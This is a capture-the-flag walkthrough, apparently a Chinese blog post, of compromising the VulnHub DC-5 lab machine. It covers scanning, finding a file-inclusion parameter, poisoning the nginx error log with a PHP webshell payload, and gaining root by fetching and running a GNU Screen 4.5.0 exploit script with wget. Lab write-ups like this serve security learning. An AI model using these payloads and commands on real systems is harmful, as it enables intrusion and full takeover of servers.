当前位置: 首页 > article >正文

[vulnhub]DC: 5

https://www.vulnhub.com/entry/dc-5,314/

主机发现端口扫描

  1. 探测存活主机,175是靶机

    nmap -sP 192.168.75.0/24
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:27 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00022s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00018s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.175
    Host is up (0.00016s latency).
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00015s latency).
    MAC Address: 00:50:56:FE:CA:7A (VMware)
    Nmap scan report for 192.168.75.151
    Host is up.
    
  2. 扫描靶机所有开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:28 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00040s latency).
    Not shown: 65532 closed tcp ports (conn-refused)
    PORT      STATE SERVICE
    80/tcp    open  http
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    
  3. 扫描服务版本及系统版本

    nmap -sV -sT -O -p80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:30 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00047s latency).
    
    PORT      STATE SERVICE VERSION
    80/tcp    open  http    nginx 1.6.2
    111/tcp   open  rpcbind 2-4 (RPC #100000)
    57203/tcp open  status  1 (RPC #100024)
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    
  4. 扫描漏洞

    nmap -script=vuln -p 80,111,57203 192.168.75.175
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-02 13:33 CST
    Nmap scan report for 192.168.75.175
    Host is up (0.00052s latency).
    
    PORT      STATE SERVICE
    80/tcp    open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-csrf:
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.75.175
    |   Found the following possible CSRF vulnerabilities:
    |
    |     Path: http://192.168.75.175:80/contact.php
    |     Form id: fname
    |_    Form action: thankyou.php
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    111/tcp   open  rpcbind
    57203/tcp open  unknown
    MAC Address: 00:0C:29:BF:7F:5F (VMware)
    

    没什么实质性信息,依旧是80端口开始

web渗透

  1. 访问主页

    在这里插入图片描述

  2. 扫描目录,没什么可以关注的

    dirsearch -u 192.168.75.175 -x 403
    //
    [13:40:35] Starting:
    [13:40:56] 200 -    4KB - /contact.php
    [13:40:56] 301 -  184B  - /css  ->  http://192.168.75.175/css/
    [13:41:00] 200 -    6KB - /faq.php
    [13:41:01] 200 -   17B  - /footer.php
    [13:41:03] 301 -  184B  - /images  ->  http://192.168.75.175/images/
    [13:41:25] 200 -  852B  - /thankyou.php
    
  3. 我们看官网下的小提示:这个特定的入口点可能很难识别,但它确实存在。您需要寻找一些不寻常的东西(刷新页面时会发生变化的东西),我们可以注意到每次提交footer页面的年份就会不一样

    在这里插入图片描述

    可能入口就存在页脚里

  4. 访问/footer.php ,一直刷新年份也会变,所以就是thankyou页面包含了footer.php ,可能存在参数来包含footer.php ,使用wfuzz来尝试混淆出参数

    # 尝试包含 /etc/passwd
    wfuzz -c -w /usr/share/wfuzz/wordlist/general/big.txt --hh 851 'http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd'
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    
    Target: http://192.168.75.175/thankyou.php?FUZZ=/etc/passwd
    Total requests: 3024
    
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload
    =====================================================================
    
    000001053:   200        70 L     104 W      2319 Ch     "file"
    
    

    混淆出参数file ,可能就是使用file 参数来包含文件的,成功包含/etc/passwd

    在这里插入图片描述

  5. 因为不存在登陆页面,所以包含了/etc/passwd文件也没用,根据CTF的思路我们尝试包含日志文件

    /thankyou.php?file=/var/log/nginx/access.log
    

    包含成功!

  6. 尝试后,UA插入php代码不成功。最后,我们可以将php代码插入到file参数后,使其发生错误,然后将该语句留在error.log

    (这里开始靶机IP改为176,之前乱搞把之前的靶机搞坏了)

    http://192.168.75.176/thankyou.php?file=<?php system($_POST['a']); ?>
    

    包含error.log ,存在&lt;?php @eval($_POST['b']); ?&gt; 即可

    2024/11/03 04:37:36 [error] 557#0: *63 FastCGI sent in stderr: "PHP message: PHP Warning:  include(&lt;?php @eval($_POST['b']); ?&gt;): failed to open stream: No such file or directory in /var/www/html/thankyou.php on line 44
    PHP message: PHP Warning:  include(): Failed opening '&lt;?php @eval($_POST['b']); ?&gt;' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/thankyou.php on line 44" while reading response header from upstream, client: 192.168.75.1, server: _, request: "GET /thankyou.php?file= HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "192.168.75.176", referrer: "http://192.168.75.176/thankyou.ph"
    

    使用蚁🗡连接(密码是b,取决以你的post参数),然后在蚁🗡里面启动终端然后反弹shell

    在这里插入图片描述

提权

  1. 查看权限

    (www-data:/var/www) $ whoami
    www-data
    (www-data:/var/www) $ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    (www-data:/var/www) $ uname -a
    Linux dc-5 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux
    
  2. 寻找敏感文件

    (www-data:/var/www) $ find / -perm -u=s -type f 2>/dev/null
    /bin/su
    /bin/mount
    /bin/umount
    /bin/screen-4.5.0
    /usr/bin/gpasswd
    /usr/bin/procmail
    /usr/bin/at
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/newgrp
    /usr/bin/chsh
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/eject/dmcrypt-get-device
    /usr/sbin/exim4
    /sbin/mount.nfs
    

    发现screen-4.5.0

  3. 搜索screen-4.5.0 是否存在提权漏洞

    searchsploit screen 4.5.0
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
     Exploit Title                                                                                                                                   |  Path
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    GNU Screen 4.5.0 - Local Privilege Escalation                                                                                                    | linux/local/41154.sh
    GNU Screen 4.5.0 - Local Privilege Escalation (PoC)                                                                                              | linux/local/41152.txt
    ------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    

    linux/local/41154.sh 拿去下来下载到靶机

  4. 执行脚本

    $ wget http://192.168.75.151/41154.sh
    converted 'http://192.168.75.151/41154.sh' (ANSI_X3.4-1968) -> 'http://192.168.75.151/41154.sh' (UTF-8)
    --2024-11-03 05:11:00--  http://192.168.75.151/41154.sh
    Connecting to 192.168.75.151:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 1149 (1.1K) [application/x-sh]
    Saving to: '41154.sh'
    
    41154.sh            100%[=====================>]   1.12K  --.-KB/s   in 0s
    
    2024-11-03 05:11:00 (8.86 MB/s) - '41154.sh' saved [1149/1149]
    //
    $ chmod u+x 41154.sh
    //
    $ ./41154.sh
    ~ gnu/screenroot ~
    [+] First, we create our shell and library...
    [+] Now we create our /etc/ld.so.preload file...
    [+] Triggering...
    ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
    [+] done!
    No Sockets found in /tmp/screens/S-www-data.
    
    # id
    id
    uid=0(root) gid=0(root) groups=0(root),33(www-data)
    # whoiam
    whoiam
    sh: 2: whoiam: not found
    # whoami
    whoami
    root
    

    提权成功,读取flag文件

    # cat thisistheflag.txt
    cat thisistheflag.txt
    
    888b    888 d8b                                                      888      888 888 888
    8888b   888 Y8P                                                      888      888 888 888
    88888b  888                                                          888      888 888 888
    888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888
    888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888
    888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P
    888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "
    888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888
    
    Once again, a big thanks to all those who do these little challenges,
    and especially all those who give me feedback - again, it's all greatly
    appreciated.  :-)
    
    I also want to send a big thanks to all those who find the vulnerabilities
    and create the exploits that make these challenges possible.
    
    

http://www.kler.cn/a/382201.html

相关文章:

  • V900新功能-电脑不在旁边,通过手机给PLC远程调试网关配置WIFI联网
  • sed命令中单引号的处理
  • 深入理解 Linux wc 命令
  • centos-stream9系统安装docker
  • linux系统编程(五)
  • VLM--CLIP作分类任务的损失函数
  • C语言中的结构体详解
  • 使用Python分析股票价格数据并计算移动平均线的实用指南
  • ISO 26262标准下的汽车电子软件开发
  • 对标 Windows Copilot 的 UOS AI,升级后更能打了
  • 2024-11-05 问AI: [AI面试题] 人工智能开发和部署的道德考虑是什么?
  • socket的一些option
  • Uniapp底部导航栏设置(附带PS填充图标教程)
  • 九宫格按键输入
  • MATLAB计算朗格朗日函数
  • 2024.11.03 周报
  • 初识arkTS
  • 记一次微信云托管搭建Redis服务
  • 【51单片机】串口通信原理 + 使用
  • 动态规划理论基础和习题【力扣】【算法学习day.23】
  • 使用 RabbitMQ 有什么好处?
  • 【大数据学习 | kafka高级部分】文件清除原理
  • 无线振动传感器的安装方法
  • text-embedding-ada-002;BGE模型;M3E模型是Moka Massive Mixed Embedding;BERT
  • react中ref使用支持父调用子组件的方法
  • 基于springboot的音乐网站的设计与实现(源码+lw+调试)